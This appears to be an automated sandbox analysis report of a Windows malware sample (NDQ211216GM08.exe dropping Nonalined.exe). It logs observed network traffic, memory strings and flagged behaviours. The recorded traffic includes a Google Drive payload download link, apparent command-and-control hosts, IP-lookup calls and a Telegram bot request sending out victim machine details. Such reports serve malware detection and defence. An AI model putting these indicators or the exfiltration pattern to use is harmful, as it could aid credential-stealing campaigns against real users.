Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 12:35:03 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.1430200400.000000000714F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: svchost.exe, 00000004.00000002.2251563547.0000025204400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: NDQ211216GM08.exe.bin.exe, Nonalined.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBjr
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000203D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjr
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/9A
Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/qA
Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254525150.0000000004090000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D
Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0DRMmf
Source: Nonalined.exe, 0000000B.00000003.1492131065.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527984035.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527968014.0000000004181000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004143000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download
Source: Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download_
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000004.00000003.1206920172.0000025204600000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002040D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBjr
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004056A8

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Nonalined.exe Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 11_2_004034F7
Creates files inside the system directory
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Windows\resources\websiders.ini Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00406BFE 0_2_00406BFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0722DF38 1_2_0722DF38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00406BFE 11_2_00406BFE
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015C19B 11_2_0015C19B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015D278 11_2_0015D278
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00155370 11_2_00155370
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015C468 11_2_0015C468
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015C738 11_2_0015C738
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015E988 11_2_0015E988
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_001569A0 11_2_001569A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_001529E0 11_2_001529E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015CA08 11_2_0015CA08
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015CCD8 11_2_0015CCD8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00159DE0 11_2_00159DE0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00153E09 11_2_00153E09
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015CFAC 11_2_0015CFAC
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00156FC8 11_2_00156FC8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015F974 11_2_0015F974
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015E97C 11_2_0015E97C
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22412A90 11_2_22412A90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E7D0 11_2_2241E7D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411FA8 11_2_22411FA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22419448 11_2_22419448
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411850 11_2_22411850
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22415148 11_2_22415148
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22419D38 11_2_22419D38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D660 11_2_2241D660
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22419668 11_2_22419668
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D670 11_2_2241D670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D209 11_2_2241D209
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D218 11_2_2241D218
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DAC8 11_2_2241DAC8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22412A80 11_2_22412A80
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DAB9 11_2_2241DAB9
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E36A 11_2_2241E36A
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E377 11_2_2241E377
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E378 11_2_2241E378
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DF11 11_2_2241DF11
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DF20 11_2_2241DF20
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410B20 11_2_22410B20
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410B30 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E7C0 11_2_2241E7C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E7CF 11_2_2241E7CF
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411F9C 11_2_22411F9C
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411841 11_2_22411841
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410040 11_2_22410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F071 11_2_2241F071
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410012 11_2_22410012
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241EC18 11_2_2241EC18
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241EC28 11_2_2241EC28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22418CC0 11_2_22418CC0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F4C8 11_2_2241F4C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F4D8 11_2_2241F4D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F080 11_2_2241F080
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22418CB1 11_2_22418CB1
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F922 11_2_2241F922
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F930 11_2_2241F930
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22415138 11_2_22415138
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241CDC0 11_2_2241CDC0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241CDAF 11_2_2241CDAF
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23417B78 11_2_23417B78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234181D0 11_2_234181D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23418FB0 11_2_23418FB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341DC30 11_2_2341DC30
